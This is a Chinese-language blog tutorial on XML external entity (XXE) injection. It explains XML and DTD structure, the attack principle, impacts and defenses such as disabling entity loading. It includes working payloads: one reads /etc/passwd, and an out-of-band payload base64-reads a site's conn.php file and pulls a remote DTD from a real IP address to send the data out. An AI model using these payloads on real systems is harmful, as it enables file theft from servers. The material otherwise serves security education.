web安全入门(第九章-1)xxe实体注入

最新推荐文章于 2024-01-26 11:00:00 发布
最新推荐文章于 2024-01-26 11:00:00 发布
阅读量339 收藏
点赞数
分类专栏: 安全入门 文章标签: 安全 爬虫 php 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/106609334
版权

一、什么是XXE

1,本质
		简单的说,就是XML外部实体注入攻击
		
		分解一下
				注入:将用户输入的内容当作代码执行
			 sql注入:将用户输入的内容当作sql代码执行
			
				XML:
						一种类似HTML的语言,
						主要是存储传输数据的,
						没有预定义标签
				实体:	
						简单的理解为变量,可以存储一些东西
		
		总结:XXE,就是XML引用的数据当作代码被执行,
						即XML外部实体注入攻击

	典型的攻击如下:
			<?xml version="1.0" encoding="ISO-8859-1">	XML声明
			<!DOCTYPE foo>[
			<!ELEMENT foo ANY>							DTD部分:实体用于定义应用普通文本或特殊字符的快捷方式的变量,,实体引用是对实体的引用,实体可在内部或外部进行声明。
			<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
			<foo>&xxe;</foo>							XML部分
			定义实体必须写在DTD部分。
			DTD是定义XML变量,可以实现远程调用。

二、XML结构

什么是xml

实际就是储存数据的。
什么是XML?
	1.XML指可扩展标记语言
	2.XML是一种标记语言,很类似HTML。
	3.XML的设计宗旨是传输数据,而非显示数据
	4.XML标签没有被预定义,需要自行定义标签。
	5.XML被设计为具有自我描述性。
	6.XML是W3C的推荐标准。
特点:
	1.XML仅仅是纯文本,它不会做任何事情。
	2.XML可以自己发明标签(允许定义自己的标签和文档结构)
	3.XML无所不在,XML是各种应用程序之间进行数据传输的最常用的工具,并且在信息存储和描述领域变得越来越流行

1,结构:
		第一部分是声明,主要定义XML使用版本和使用编码
		第二部分是DTD部分,主要是约束作用,简单的说,给内容部分定规矩
				DTD约束的三种形式即:
					  内部DTD:<!DOCTYPE 根节点  [DTD的代码]>
					  外部DTD:<!DOCTYPE 根节点 "DTD的地址">
					  网络DTD:<!DOCTYPE 根节点 PUBLIC  "DTD的名称"  "DTD的地址">
		第三部分是内容

2,直接上例子:
		//外部DTD:
			<?xml version="1.0" encoding="UTF-8"?>
			<!DOCTYPE书架  SYSTEM "book.dtd">
			<书架>
					<书>
							<书名>葵花宝典</书名>
							<作者>东方不败</作者>
							<售价>88.00元</售价>
					</书>
			</书架>
		
		//内部DTD:
			<?xml version="1.0" encoding="UTF-8"?>					
			<!DOCTYPE 书架 [
					<!ELEMENT 书架 (书+)>
					<!ELEMENT 书 (书名,作者,售价)>
					<!ELEMENT 书名 (#PCDATA)>
					<!ELEMENT 作者 (#PCDATA)>
					<!ELEMENT 售价 (#PCDATA)>
			]>
			<书架>
					<书>
							<书名>葵花宝典</书名>
							<作者>东方不败</作者>
							<售价>88.00元</售价>
					</书>
					。。。
			</书架>

三、XXE原理

1,工具过程原理
	DTD部分去读取敏感的信息
	将读取到的信息赋值到实体当中		//实体名字随便起
	XML部分使用的过程中,将实体内容输出

2,补充
	XML本身没有危害,他就是一个存储数据的;但是在一些动态语言脚本里边,
	例如:php中,它可以利用simplexml_load_string函数,将XML转化为对象
		
		注:Java中什么是类?什么是对象?
				~类就是具备某些共同特征的实体的集合
				~对象就是一个真实世界中的物体
				举例:
						“人”就是一个类,他有吃饭、睡觉的属性,
						而张三这个人,就是“人”这个类的对象
3,不足及解决
	很多时候后端语言解析了XML后其实并不会给你输出,
	难道这样子我们就不能进行XXE了?	
	办法:
			我们可以使用一个类型接收平台一样的接收器。
			XML读取数据然后发送到接受的平台,然后接受平台存储,
			我们再去接受平台查看就可以了。
			
			很类似反弹注入
	步骤:
			公网上建一个web环境 [1.xml 2.php 3.txt]
				1.xml 负责 读取我们想要的内容
				2.php 负责收集1.xml的传参,并将参数内容保存到3.txt中
				3.txt 保存传参数据,方便我们查看

四、实战注意

1,
	黑盒比较难挖掘
	白盒审计较容易
	平时挖掘src时,比较少
	但是,扫描器漏扫一些网站较为容易扫出
	

2,危害
	~读取任意文件
	~执行系统命令
	~探测内网端口
	~攻击内网网站
	~导致DDos攻击

3,防御
	~使用开发语言提供的禁用外部实体的方法
		如:PHP:
				libxml_disable_loader(ture);
				
			其他语言:
				https://owasp.org/www-project-cheat-sheets/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
		
	~过滤用户提交的XML数据
		
		关键词:SYSTEM和PUBLIC

XXE-防御:

方案一:
	使用开发语言提供的禁用外部实体的方法。
	php:libxml_disable_entity_loader(true);
方案二:
	过滤用户提交的xml数据
	关键词:不允许出现SYSTEM和PUBUC。

攻击代码

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpStudy/scms/conn/conn.php">
<!ENTITY % remote SYSTEM "http://59.63.200.79:8014/xxe/1.xml"> 
%remote;
%send; 
]>
YINZHE_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
xxe漏洞之scms靶场漏洞
qq_59020256的博客
01-22 788
simplexml_load_string--将XML字符串解释为对象。(1)全局搜索simplexml_load_string。用burp抓包输入代码得到。因此这里就存在xxe漏洞。成功写入证明漏洞验证成功。与上述同理先访问漏洞点。因此也存在xxe漏洞。将get改为post。将get改为post。
SCMS系统基于PHPXXE漏洞分析
qq_61529962的博客
12-15 201
xml漏洞,XXE,SCMS漏洞分析,PHP,附带靶场代码
XXE实体注入(超详细!)
qq_45300786的博客
09-06 9803
可以把它理解为txt,就是存储文件的, 读取并调用出来,这是最核心的 将你的代码当成XXE代码,然后XXE再交给PHP去执行 将1.txt的东西,放入test这个变量 实体就是变量 &test就是输出这个变量 <scan></scan>只是一个声明格式,随便写什么,就算写成<abc></abc>都可以,只要满足<x></x>格式就行 最主要的是访问的地址,file,http等协议都可以。 XXE:XML外部实体注入,原理:.
XXE - 实体注入
净邪的博客
06-26 1305
什么是xxeXXE = XML External Entity 即外部实体,从安全角度理解成XML External Entity attack XML外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分 拆分开来简单点来说就是: XML: 官方介绍: XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。.
信息安全_xxe注入应用与拓展.pptx
08-14
XXE注入详解】 XXE,全称为XML External Entity ...总的来说,XXE注入是一个严重的安全问题,涉及Web服务、框架、文件解析等多个领域。开发者应当了解其原理,采取有效措施预防此类攻击,以保护系统的安全
105-web漏洞挖掘之XXE漏洞1
08-03
理解并防范XXE漏洞对于保障Web应用程序的安全至关重要,因为它们可能导致严重的信息泄露和系统破坏。通过深入理解XML实体、XML解析器的工作原理以及如何安全地处理XML输入,开发者可以更好地保护他们的应用程序免受...
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
WebGoat8-xxe注入漏洞分析
09-15
Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 XXE 注入漏洞的工作...
xxe实体注入
qq_42307546的博客
01-25 1582
XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入 由于 xxe 漏洞主要是利用了 DTD 引用外部实体导致的漏洞,那么重点看下能引用哪些类型的外部实体。当 libXML <libxml2.9 才会造成外部注入漏洞。 XXE漏洞代码分析 &l
XXE-实体注入
Keepb1ue的博客
06-11 4286
XXE介绍 XXE即外部实体,从安全角度理解为XML外部实体注入攻击 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 内部DTD声明: <!DOCTYPE 根元素 [元素声明]> 实
XXE(外部实体注入)详解
2401_82576671的博客
01-23 1999
​ 应用程序在解析XML时没有过滤外部实体的加载,导致加载了恶意的外部文件,造成执行命令、读取文件、扫描内网、攻击内网等危害。​ 运维人员使用了低版本的php,libxml低于2.9.1或者设置了libxml_disable_entity_loader(False)就可以加载外部实体。将文档类型直接放入XML文档中,称为内部定义。内部定义格式:<!DOMCTYPE 根元素 [元素声明]>DOCTYPE note[ #定义跟根节点。
OWASP之XXE(XML外部实体注入
zzhokok的博客
08-14 454
libxml版本2.9.1之前,不包含2.9.1 使用phpinfo()查看libxml的版本信息 XML文档 组成:xml声明,DTD部分,xml部分 DTD知识 XXE利用 实战-bwapp-火狐-burp
【burpsuite安全练兵场-服务端10】XML外部实体注入XXE注入)-9个实验(全)
最新发布
wangluoanquan111的博客
01-26 1109
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
XXE实体注入原理作用与具体操作
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-12 1002
XXE——实体注入 原理:XXE=XML External Entity 即外部实体,即外部实体,从安全角度理解成XML External Entity attack XML 外部实体注入攻击 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 当XML允许引用外部实体时,通过构造恶意XML文档,根据建站语言使用不同的协议可导致读取任意文件内容、执行系统命令、探测内网端口、访问内网网站等危害。由于站点的建站语言不同,PHP、JA
命令执行漏洞多种写入webshell方式总结
Thunderclap的博客
02-24 3032
, 这些字符与双引号一起使用时具有特殊含义,并且在显示之前对其进行评估。单引号中的任何字符都没有特殊含义, 当你不想使用转义字符来更改 shell 脚本解释输入字符串参数方式时,就会很方便。简而言之,shell 将逐字解释单引号内的封闭文本,并且不会插入任何内容,包括变量、反引号、某些 \ 转义符等。在windows中,批处理需要转义字符主要有 “&”,“|”,“”等等,转义字符为”^”在Linux中,需要转义字符主要是 单引号 或者双引号 对于单引号,我们将其替换为\47即可。
代码审计之scms——search.php注入漏洞
weixin_40709439的博客
01-18 2571
电脑没网络,只能在本地审计之前审计过的cms,这次审计scms 还是法师审计工具自动审计一波,发现可能存在漏洞的文件,发现fearch.php可能存在sql注入。 &amp;lt;?php require 'conn/conn.php'; require 'conn/function.php'; $action=$_GET[&quot;action&quot;]; $keyword=$_REQUEST[&quot;keyword&quot;]...
XXE(XML外部实体注入)详解
一期一会的博客
01-22 5241
XXE漏洞 XXE(XML External Entity Injection)又称为“XML外部实体注入漏洞”。 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 XML简介 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTM
ctfshow web 入门xxe
08-23
通过提供合适的XML实体值,可以利用XXE(XML外部实体注入)漏洞来执行一些攻击,比如读取文件内容等。 要利用XXE漏洞进行ctfshow的Web入门,可以构造一个恶意的XML实体,例如: <!DOCTYPE test [ <!ENTITY...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值